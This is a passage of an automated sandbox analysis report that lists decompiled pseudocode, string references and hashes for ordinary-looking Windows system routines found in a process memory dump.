0x1efe8c4b
0x1efe8c7e
0x00000000
0x00000000
0x00000000
0x1efe8c4b
0x1efe8c2e
0x1efe8c22
0x1efe8bf0
0x1efe8c6e

Strings

WindowsExcludedProcs, xrefs: 1EFE8C07

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
Instruction ID: 3f17e08b70511667578dd1ff0cbcfbdaef3421885e13e8f49a077bf97cdc1699
Opcode Fuzzy Hash: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
Instruction Fuzzy Hash: 7621CB37502654BBDB22EB5988A5F5FB7A9DF42A50F064125BD04AB510D631ED01C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC4FB6 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFC4FB6(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L22:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L22;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x1efc4fbd
0x1efc4fc2
0x1efc4fc6
0x1f020531
0x1efc5005
0x1efc5009
0x1efc5009
0x1efc4fd2
0x1f02053b
0x00000000
0x1f02053b
0x1efc4fd8
0x1efc4fda
0x1efc4fdc
0x1efc4fdf
0x1efc4fe6
0x1efc5018
0x1efc5052
0x1efc5052
0x1efc4ff4
0x1efc4ffa
0x1efc4ffd
0x1efc4fff
0x1efc5001
0x1efc500f
0x1efc5011
0x1efc5011
0x1efc500f
0x1efc5003
0x00000000
0x1efc5003
0x1efc501d
0x1efc504c
0x1efc504e
0x00000000
0x1efc504e
0x1efc501f
0x1efc5022
0x1efc5024
0x1efc5026
0x00000000
0x00000000
0x00000000
0x1efc5028
0x1efc4fe8
0x1efc4fed
0x1efc502d
0x1efc5033
0x1efc5043
0x1efc5048
0x00000000
0x1efc5048
0x1efc5038
0x00000000
0x00000000
0x1efc503d
0x1efc5059
0x00000000
0x1efc5059
0x1efc503f
0x00000000
0x1efc4fef
0x1efc4fef
0x00000000
0x1efc4fef

Strings

Actx , xrefs: 1EFC4FDF

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 1fdf9d25d9b9ede4529beda9ad38b399e52bf8f2790eac8db2e9a3e9391c8626
Instruction ID: 5d5d396a3b516f67a7f2691a18597031a93e4a1b56638a8be246eefb0e1ecd65
Opcode Fuzzy Hash: 1fdf9d25d9b9ede4529beda9ad38b399e52bf8f2790eac8db2e9a3e9391c8626
Instruction Fuzzy Hash: 4311B6327846438BEB245E0E9478F6672D6EBD5260F30073EEC61CB394D672D840C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 1F040CEE Relevance: 1.3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1F040CEE(void* __ebx, intOrPtr __ecx, void* __edx, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char* _v60;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t41;
				void* _t44;
				signed int _t45;

				_t38 = __edx;
				_t33 = __ebx;
				_t47 = (_t45 & 0xfffffff8) - 0x68;
				_v8 =  *0x1f0bb370 ^ (_t45 & 0xfffffff8) - 0x00000068;
				_t26 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t26 = E1EFC0FB0(__ecx, __edx, 0x1f0b6988, 0x1f041000, 0, 0);
					if( *0x1f0b3368 > 4 && E1EFBDE1A(0x1f0b3368, 0, 0x4000) != 0) {
						_t38 = 0x1efa0b50;
						_v100 = _a4;
						_v96 = _a8;
						_v44 =  &_v100;
						_v28 =  &_v104;
						_v60 = "LdrCreateEnclave";
						_v56 = 0;
						_v52 = 0x11;
						_v48 = 0;
						_v40 = 0;
						_v36 = 8;
						_v32 = 0;
						_v104 = __ecx;
						_v24 = 0;
						_v20 = 4;
						_v16 = 0;
						_t26 = E1F04105C(0x1f0b3368, 0x1efa0b50, 0x1f0b3368, 0x1f0b3368, 5,  &_v92);
					}
				}
				_pop(_t41);
				_pop(_t44);
				return E1F004B50(_t26, _t33, _v8 ^ _t47, _t38, _t41, _t44);
			}

0x1f040cee
0x1f040cee
0x1f040cf6
0x1f040d00
0x1f040d04
0x1f040d13
0x1f040d25
0x1f040d31
0x1f040d4e
0x1f040d53
0x1f040d5a
0x1f040d62
0x1f040d6a
0x1f040d77
0x1f040d7f
0x1f040d83
0x1f040d8b
0x1f040d8f
0x1f040d93
0x1f040d9b
0x1f040d9f
0x1f040da3
0x1f040da7
0x1f040daf
0x1f040db3
0x1f040db3
0x1f040d31
0x1f040dbc
0x1f040dbd
0x1f040dc8

Strings

LdrCreateEnclave, xrefs: 1F040D77

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 6c94bd21670da1d0f1f7e536c7bf2e0c49a934fcb5b417658096f845767f5420
Instruction ID: 1eb68c68f1f8654fe8ae60d6213c0ecdb220a2235e56c61d5b0c45b996a1bba1
Opcode Fuzzy Hash: 6c94bd21670da1d0f1f7e536c7bf2e0c49a934fcb5b417658096f845767f5420
Instruction Fuzzy Hash: F82104B55183849FC310CF1A8944A9BFBE8BFD5B50F204A2EF9A497250D7B1A404CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1F076B77 Relevance: 1.3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1F076B77(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t29;
				intOrPtr _t35;
				void* _t44;

				_t42 = __esi;
				_t40 = __edi;
				_t39 = __edx;
				_t35 = __ecx;
				_t33 = __ebx;
				_push(0x6c);
				_push(0x1f09d570);
				E1F017C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t44 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t44 - 0x78)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E1F04EF10(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t44 + 8)) != 0) {
						 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
						asm("int3");
						 *(_t44 - 4) = 0xfffffffe;
					}
				}
				 *((intOrPtr*)(_t44 - 0x74)) =  *((intOrPtr*)(_t44 - 0x78));
				 *((intOrPtr*)(_t44 - 0x70)) = 1;
				 *(_t44 - 0x6c) =  *(_t44 - 0x6c) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x68)) = L1F018A60;
				 *((intOrPtr*)(_t44 - 0x64)) = 1;
				 *((intOrPtr*)(_t44 - 0x60)) =  *((intOrPtr*)(_t44 - 0x7c));
				_t29 = E1F076C0D(_t33, _t39, _t40, _t42);
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
				return _t29;
			}

0x1f076b77
0x1f076b77
0x1f076b77
0x1f076b77
0x1f076b77
0x1f076b77
0x1f076b79
0x1f076b7e
0x1f076b83
0x1f076b86
0x1f076b94
0x1f076bb0
0x1f076bbc
0x1f076bbe
0x1f076bc2
0x1f076bcc
0x1f076bcc
0x1f076bbc
0x1f076bd6
0x1f076bdc
0x1f076bdf
0x1f076be3
0x1f076bea
0x1f076bf0
0x1f076bf6
0x1f076bfe
0x1f076c0a

Strings

Critical error detected %lx, xrefs: 1F076BA7

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 9883b0c0244042690b630e188e9693754f7b3ddfcbbb073e7715d4d94dd018ca
Instruction ID: 087430ac4cf3844e587081fa392ce0f310f2d2d2841363a6491940d9ad8b1644
Opcode Fuzzy Hash: 9883b0c0244042690b630e188e9693754f7b3ddfcbbb073e7715d4d94dd018ca
Instruction Fuzzy Hash: 121157B6E54348CBEB25CFA4C901BDDBBF0EB05314F20466ED4A6AB282E7756641CF14

Uniqueness

Uniqueness Score: -1.00%

Function 1F057CE8 Relevance: .6, Instructions: 617
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1F057CE8(intOrPtr __ecx, signed int __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int* _a28) {
				signed int _v8;
				char _v48;
				char _v56;
				signed int _v96;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v117;
				char _v118;
				signed int _v124;
				signed int* _v128;
				char _v129;
				char _v130;
				signed int _v136;
				signed int* _v140;
				signed int _v144;
				signed int _v148;
				short _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				signed int _v204;
				char _v208;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t282;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				signed int _t299;
				intOrPtr* _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t313;
				signed char _t320;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t355;
				char _t361;
				signed short _t362;
				signed int _t369;
				signed int _t379;
				signed int _t381;
				signed int _t382;
				signed int _t405;
				signed int _t410;
				signed int _t413;
				signed int _t417;
				signed int _t418;
				intOrPtr _t419;
				unsigned int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				intOrPtr _t433;
				signed int _t435;
				signed char* _t438;
				intOrPtr _t444;
				signed int _t446;
				intOrPtr _t447;
				signed int _t449;
				signed int _t451;
				signed int _t452;
				intOrPtr _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int* _t460;
				signed int _t463;
				signed int _t464;
				signed int _t472;
				signed int _t473;
				signed char _t479;
				intOrPtr _t480;
				signed int _t482;
				signed int _t484;
				signed char _t488;
				signed int _t492;
				signed int _t495;
				signed char _t499;
				signed int _t502;
				intOrPtr _t504;
				intOrPtr* _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t511;
				signed int _t512;
				signed short _t513;
				signed int _t514;
				signed int* _t517;
				signed int* _t518;
				signed int _t519;
				intOrPtr _t520;
				signed int _t523;
				signed int* _t525;
				signed int _t527;
				void* _t528;

				_t466 = __edx;
				_v8 =  *0x1f0bb370 ^ _t527;
				_t417 = __edx;
				_v124 = __edx;
				_v180 = __ecx;
				_v176 = _a12;
				_v200 = _a16;
				_v140 = _a24;
				_v112 = 0;
				_v144 = 0;
				_v168 = 0;
				_v156 = 0;
				_t517 = _a28;
				_v128 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_v164 = _t517;
				_v152 = 0x300;
				_t282 = E1EFE82F0( &_v104,  &_v156, 1);
				_t503 = _t282;
				if(_t282 < 0) {
					L16:
					return E1F004B50(_t503, _t417, _v8 ^ _t527, _t466, _t503, _t517);
				}
				_v96 = _v96 & 0x00000000;
				_t287 = E1EFE82F0( &_v56,  &_v156, 1);
				_t503 = _t287;
				if(_t287 < 0) {
					goto L16;
				}
				_t504 = _v180;
				 *_t517 = 0x400;
				_v48 = 1;
				 *_v140 =  *_v140 & 0x00000000;
				_t532 = _t504;
				if(_t504 == 0) {
					L5:
					_push(_t417);
					_t289 = E1EFE3770(_t417, _t504, _t517, __eflags);
					__eflags = _t289;
					if(_t289 == 0) {
						L4:
						_t503 = 0xc0000077;
						goto L16;
					}
					_t290 = _a4;
					_v156 = _t290;
					__eflags = _t290;
					asm("sbb eax, eax");
					_t299 = E1EFE7882(_t504, 0, 0, _a8, 1, 0,  &_v104,  &_v56,  &_v104,  &_v56, _a20, 2,  ~_t290 &  &_a4, 0 | _t290 != 0x00000000,  &_v112,  &_v130,  &_v208);
					_t466 = _v112;
					_t503 = _t299;
					_v172 = _t466;
					__eflags = _t503 - 0x8000000b;
					if(_t503 != 0x8000000b) {
						__eflags = _t503;
						if(_t503 < 0) {
							L11:
							_t517 = _v128;
							L12:
							__eflags = _t466;
							if(_t466 != 0) {
								E1EFD3BC0(_t517, 0, _t466);
							}
							_t417 = _v144;
							__eflags = _t417;
							if(_t417 != 0) {
								E1EFD3BC0(_t517, 0, _t417);
							}
							goto L16;
						}
						_t433 =  *0x1f0b5d78; // 0x0
						_t472 = E1EFD5D90(_t433 + 0x140000, _v128, _t433 + 0x140000, ( *(_t417 + 4) & 0x0000ffff) * 0x18);
						_v168 = _t472;
						__eflags = _t472;
						if(_t472 != 0) {
							_v148 = _v148 & 0x00000000;
							_t305 = _t417 + 8;
							_v136 = _v136 & 0x00000000;
							_t505 = _t305;
							_v160 = _t305;
							_t306 =  *(_t417 + 4) & 0x0000ffff;
							_t435 = _t306;
							__eflags = _v136 - _t306;
							if(_v136 >= _t306) {
								L31:
								_t473 = _v172;
								_v136 = _v136 & 0x00000000;
								_t307 = _t435 & 0x0000ffff;
								_t506 = _t473 + 8;
								_v112 = _t506;
								__eflags = 0 -  *((intOrPtr*)(_t473 + 4));
								if(0 >=  *((intOrPtr*)(_t473 + 4))) {
									L53:
									_t308 = _t307 & 0x0000ffff;
									_v118 = 0;
									_t507 = 0;
									_v117 = 0;
									_v108 = 0;
									_t438 = _t417 + 8;
									_v112 = 0;
									_v184 = _t308;
									__eflags = _t308;
									if(_t308 == 0) {
										L68:
										__eflags = _v156;
										asm("sbb ecx, ecx");
										_t503 = E1EFE7882(_v180, 0, 0, _a8, 1, 0, _v176, _v200, _v176, _v200, _a20, 2,  ~_v156 &  &_a4, 0 | _v156 != 0x00000000,  &_v144,  &_v130,  &_v208);
										__eflags = _t503;
										if(_t503 < 0) {
											L95:
											_t313 = _v168;
											_t517 = _v128;
											__eflags = _t313;
											if(_t313 != 0) {
												E1EFD3BC0(_t517, 0, _t313);
											}
											_t466 = _v172;
											goto L12;
										}
										_t508 = _v144;
										_t444 =  *0x1f0b5d78; // 0x0
										_t446 = E1EFD5D90(_t444 + 0x140000, _v128, _t444 + 0x140000, ( *(_t508 + 2) & 0x0000ffff) + _v108);
										 *_v140 = _t446;
										__eflags = _t446;
										if(_t446 == 0) {
											L93:
											_t503 = 0xc0000017;
											goto L95;
										}
										_t479 =  *_t417;
										_t320 =  *_t508;
										__eflags = _t320 - _t479;
										if(_t320 <= _t479) {
											_t320 = _t479;
										}
										_t324 = E1EFE7C20(_t446, ( *(_t508 + 2) & 0x0000ffff) + _v108, _t320 & 0x000000ff);
										__eflags = _t324;
										if(_t324 < 0) {
											goto L7;
										} else {
											_t480 = 0;
											_v176 = 0;
											_t451 =  *_v140 + 8;
											_v108 = _t451;
											__eflags = 0 -  *(_t417 + 4);
											if(0 >=  *(_t417 + 4)) {
												L87:
												_t418 = _v144;
												E1F0088C0(_t451, _t418 + 8, ( *(_t508 + 2) & 0x0000ffff) - 8);
												_t528 = _t528 + 0xc;
												_t452 =  *_v140;
												_t259 = _t452 + 4;
												 *_t259 =  *(_t452 + 4) +  *((intOrPtr*)(_t418 + 4));
												__eflags =  *_t259;
												L88:
												_t417 = _v124;
												L89:
												_t325 =  *_t517;
												_t503 = 0;
												__eflags = _t325 & 0x00001000;
												if((_t325 & 0x00001000) == 0) {
													goto L95;
												}
												_t518 = _v140;
												__eflags =  *_t518;
												if( *_t518 != 0) {
													E1EFD3BC0(_v128, 0,  *_t518);
													 *_t518 =  *_t518 & 0;
													__eflags =  *_t518;
												}
												_t447 =  *0x1f0b5d78; // 0x0
												_t449 = E1EFD5D90(_t447 + 0x140000, _v128, _t447 + 0x140000,  *(_t417 + 2) & 0x0000ffff);
												 *_t518 = _t449;
												__eflags = _t449;
												if(_t449 != 0) {
													E1F0088C0(_t449, _t417,  *(_t417 + 2) & 0x0000ffff);
													_t503 = 0;
													__eflags = 0;
													goto L95;
												} else {
													goto L93;
												}
											}
											_t519 = _t451;
											_t340 = _v168 + 0x10;
											__eflags = _t340;
											_t453 = _t417 + 8;
											_v112 = _t340;
											do {
												_t511 =  *(_t340 - 4) |  *(_t340 + 4) |  *_t340;
												__eflags = _t511;
												if(_t511 == 0) {
													goto L85;
												}
												_t419 = _v160;
												E1F0088C0(_t519, _t419,  *(_t419 + 2) & 0x0000ffff);
												 *(_t519 + 1) =  *(_t519 + 1) & 0x000000ef;
												_t454 = _t519;
												_t528 = _t528 + 0xc;
												_t519 = _t519 + ( *(_t419 + 2) & 0x0000ffff);
												_v180 = _t454;
												_v108 = _t519;
												 *((short*)( *_v140 + 4)) =  *((short*)( *_v140 + 4)) + 1;
												 *(_t454 + 4) =  *(_t419 + 4) & _t511;
												_t420 = 0x80000000;
												_t512 = _t511 &  !( *(_t419 + 4));
												__eflags = _t512;
												if(_t512 == 0) {
													L84:
													_t239 = _t454 + 4;
													 *_t239 =  *(_t454 + 4) | _t512;
													__eflags =  *_t239;
													_t340 = _v112;
													_t417 = _v124;
													_t480 = _v176;
													_t453 = _v160;
													goto L85;
												}
												_t520 = _v160;
												do {
													__eflags = _t420 - 0x10000000;
													if(_t420 < 0x10000000) {
														break;
													}
													__eflags =  *(_t520 + 4) & _t420;
													if(( *(_t520 + 4) & _t420) != 0) {
														_v136 = _t420;
														E1EFE83E0( &_v136, _a20);
														_t355 = _v136;
														_t454 = _v180;
														__eflags = _t512 & _t355;
														if((_t512 & _t355) != 0) {
															 *(_t454 + 4) =  *(_t454 + 4) | _t420;
															_t512 = _t512 &  !_t355;
															__eflags = _t512;
														}
													}
													_t420 = _t420 >> 1;
													__eflags = _t512;
												} while (_t512 != 0);
												_t519 = _v108;
												goto L84;
												L85:
												_t480 = _t480 + 1;
												_v112 = _t340 + 0x18;
												_t453 = _t453 + ( *(_t453 + 2) & 0x0000ffff);
												_v176 = _t480;
												__eflags = _t480 - ( *(_t417 + 4) & 0x0000ffff);
												_v160 = _t453;
												_t340 = _v112;
											} while (_t480 < ( *(_t417 + 4) & 0x0000ffff));
											_t517 = _v164;
											_t451 = _v108;
											_t508 = _v144;
											goto L87;
										}
									}
									_t482 = _v168 + 0x10;
									__eflags = _t482;
									do {
										__eflags =  *(_t482 - 4) |  *(_t482 + 4) |  *_t482;
										_t361 =  *((intOrPtr*)(( *_t438 & 0x000000ff) + 0x1ef98980));
										if(( *(_t482 - 4) |  *(_t482 + 4) |  *_t482) != 0) {
											_t513 = _t438[2] & 0x0000ffff;
											_v108 = _v108 + _t513;
											_v129 = _t361;
											__eflags = _t361;
											if(_t361 != 0) {
												L64:
												__eflags = _v129 - 1;
												_t362 = _t513;
												if(_v129 != 1) {
													L66:
													_t507 = _v112;
													goto L67;
												}
												__eflags = _v118;
												if(_v118 != 0) {
													goto L7;
												}
												goto L66;
											}
											__eflags = _v117 - _t361;
											if(_v117 != _t361) {
												goto L7;
											}
											goto L64;
										}
										__eflags = _t361;
										if(_t361 == 0) {
											_v118 = 1;
										}
										__eflags = _t361 - 1;
										if(_t361 == 1) {
											_v117 = _t361;
										}
										_t362 = _t438[2] & 0x0000ffff;
										L67:
										_t507 = _t507 + 1;
										_t482 = _t482 + 0x18;
										_v112 = _t507;
										_t438 =  &(_t438[_t362 & 0x0000ffff]);
										__eflags = _t507 - _v184;
									} while (_t507 < _v184);
									goto L68;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t421 =  *_t506;
									__eflags = _t421 - 8;
									if(_t421 > 8) {
										break;
									}
									__eflags = _t421 - 4;
									if(_t421 == 4) {
										break;
									}
									_v116 =  *((intOrPtr*)(_t506 + 4));
									E1EFE83E0( &_v116, _a20);
									__eflags = _t421;
									if(_t421 == 0) {
										L40:
										_t455 =  *(_a20 + 0xc);
										L41:
										_t456 = _t455 & _v116;
										__eflags = _t456;
										if(_t456 == 0) {
											L61:
											_t417 = _v124;
											L51:
											_t506 = _t506 + ( *(_t506 + 2) & 0x0000ffff);
											_t369 = _v172;
											_t484 = _v136 + 1;
											_v136 = _t484;
											_v112 = _t506;
											__eflags = _t484 - ( *(_t369 + 4) & 0x0000ffff);
											if(_t484 < ( *(_t369 + 4) & 0x0000ffff)) {
												continue;
											}
											_t307 =  *(_t417 + 4) & 0x0000ffff;
											goto L53;
										}
										_t488 =  !( *(_t506 + 1) & 0x000000ff) & 0x00000008 |  *(_t506 + 1) & 3;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L61;
										}
										asm("sbb ebx, ebx");
										_t424 =  ~(_t488 & 2) & _t456;
										_v188 = _t424;
										_v108 = _t424;
										_t417 = _v124;
										asm("sbb eax, eax");
										_t379 =  ~(_t488 & 1) & _t456;
										_v184 = _t379;
										_v116 = _t379;
										asm("sbb edx, edx");
										_v192 = _v192 & 0x00000000;
										_t492 =  ~(_t488 & 8) & _t456;
										_t458 = _v160;
										_t514 = _t492;
										__eflags = 0 -  *(_t417 + 4);
										_t517 = _v164;
										_v204 = _t492;
										_v196 = _v160;
										if(0 >=  *(_t417 + 4)) {
											L49:
											__eflags = _t514 | _v116 | _v108;
											if((_t514 | _v116 | _v108) != 0) {
												goto L7;
											}
											_t506 = _v112;
											goto L51;
										}
										_v116 = _t379;
										_t381 = _v168 + 0x14;
										__eflags = _t381;
										_v108 = _v188;
										_t523 = _v112;
										_v148 = _t381;
										do {
											_t382 = E1EFE8535(_t523, _t458, _v176, _v200);
											_t460 = _v148;
											__eflags = _t382;
											if(_t382 != 0) {
												_t514 = _t514 &  !( *(_t460 - 0xc));
												_v108 = _v108 &  !( *(_t460 - 0x14));
												_v116 = _v116 &  !( *(_t460 - 0x10));
												 *_t460 =  *_t460 &  !_v204;
												 *(_t460 - 8) =  *(_t460 - 8) &  !_v188;
												_t140 = _t460 - 4;
												 *_t140 =  *(_t460 - 4) &  !_v184;
												__eflags =  *_t140;
											}
											_v148 =  &(_t460[6]);
											_t495 = _v192 + 1;
											_t462 = _v196;
											_v192 = _t495;
											_t458 = _v196 + ( *(_t462 + 2) & 0x0000ffff);
											_v196 = _v196 + ( *(_t462 + 2) & 0x0000ffff);
											__eflags = _t495 - ( *(_t417 + 4) & 0x0000ffff);
										} while (_t495 < ( *(_t417 + 4) & 0x0000ffff));
										_t517 = _v164;
										goto L49;
									}
									__eflags = _t421 - 1;
									if(_t421 == 1) {
										goto L40;
									}
									__eflags = _t421 - 5;
									if(_t421 == 5) {
										goto L40;
									}
									__eflags = _t421 - 6;
									if(_t421 == 6) {
										goto L40;
									}
									_t455 =  *(_a20 + 0xc) | 0x01000000;
									goto L41;
								}
								L39:
								 *_t517 =  *_t517 | 0x00001000;
								goto L88;
							}
							_t59 = _t472 + 4; // 0x4
							_v116 = _t59;
							while(1) {
								_t425 =  *_t505;
								__eflags = _t425 - 8;
								if(_t425 > 8) {
									goto L39;
								}
								__eflags = _t425 - 4;
								if(_t425 == 4) {
									goto L39;
								}
								_v108 =  *((intOrPtr*)(_t505 + 4));
								E1EFE83E0( &_v108, _a20);
								__eflags = _t425;
								if(_t425 == 0) {
									L26:
									_t463 =  *(_a20 + 0xc);
									L27:
									_t464 = _t463 & _v108;
									_t499 =  !( *(_t505 + 1) & 0x000000ff) & 0x00000008 |  *(_t505 + 1) & 3;
									_t405 = _v116;
									__eflags = _t499 & 0x00000002;
									if((_t499 & 0x00000002) == 0) {
										_t426 = 0;
										_t75 =  &_v112;
										 *_t75 = _v112 & 0;
										__eflags =  *_t75;
									} else {
										_t426 = _t464;
										_v112 = _t464;
									}
									 *(_t405 + 8) = _v112;
									_t525 = _v116;
									asm("sbb eax, eax");
									 *(_t525 - 4) = _t426;
									_t417 = _v124;
									_t410 =  ~(_t499 & 1) & _t464;
									 *_t525 = _t410;
									_t525[3] = _t410;
									asm("sbb eax, eax");
									_t413 =  ~(_t499 & 8) & _t464;
									_t502 = _v148 + 1;
									_t525[1] = _t413;
									_t525[4] = _t413;
									_t435 =  *(_t417 + 4) & 0x0000ffff;
									_t505 = _t505 + ( *(_t505 + 2) & 0x0000ffff);
									_v116 =  &(_t525[6]);
									_t517 = _v164;
									_v148 = _t502;
									__eflags = _t502 - _t435;
									if(_t502 < _t435) {
										continue;
									} else {
										goto L31;
									}
								}
								__eflags = _t425 - 1;
								if(_t425 == 1) {
									goto L26;
								}
								__eflags = _t425 - 5;
								if(_t425 == 5) {
									goto L26;
								}
								__eflags = _t425 - 6;
								if(_t425 == 6) {
									goto L26;
								}
								_t463 =  *(_a20 + 0xc) | 0x01000000;
								goto L27;
							}
							goto L39;
						} else {
							_t466 = _v172;
							_t503 = 0xc0000017;
							goto L11;
						}
					}
					L7:
					 *_t517 =  *_t517 | 0x00001000;
					goto L89;
				}
				_push(_t504);
				if(E1EFE3770(_t417, _t504, _t517, _t532) != 0) {
					goto L5;
				}
				goto L4;
			}

0x1f057ce8
0x1f057cfa
0x1f057d00
0x1f057d02
0x1f057d05
0x1f057d0e
0x1f057d17
0x1f057d20
0x1f057d28
0x1f057d2b
0x1f057d31
0x1f057d37
0x1f057d43
0x1f057d49
0x1f057d59
0x1f057d5f
0x1f057d68
0x1f057d6d
0x1f057d71
0x1f057ea1
0x1f057eb1
0x1f057eb1
0x1f057d77
0x1f057d88
0x1f057d8d
0x1f057d91
0x00000000
0x00000000
0x1f057d9d
0x1f057da3
0x1f057da9
0x1f057db0
0x1f057db3
0x1f057db5
0x1f057dcb
0x1f057dcb
0x1f057dcc
0x1f057dd1
0x1f057dd3
0x1f057dc1
0x1f057dc1
0x00000000
0x1f057dc1
0x1f057dd5
0x1f057ddd
0x1f057de3
0x1f057dea
0x1f057e23
0x1f057e28
0x1f057e2b
0x1f057e2d
0x1f057e33
0x1f057e39
0x1f057e46
0x1f057e48
0x1f057e7e
0x1f057e7e
0x1f057e81
0x1f057e81
0x1f057e83
0x1f057e89
0x1f057e89
0x1f057e8e
0x1f057e94
0x1f057e96
0x1f057e9c
0x1f057e9c
0x00000000
0x1f057e96
0x1f057e4e
0x1f057e67
0x1f057e69
0x1f057e6f
0x1f057e71
0x1f057eb4
0x1f057ebb
0x1f057ebe
0x1f057ec5
0x1f057ec7
0x1f057ecd
0x1f057ed1
0x1f057ed3
0x1f057eda
0x1f057fb8
0x1f057fb8
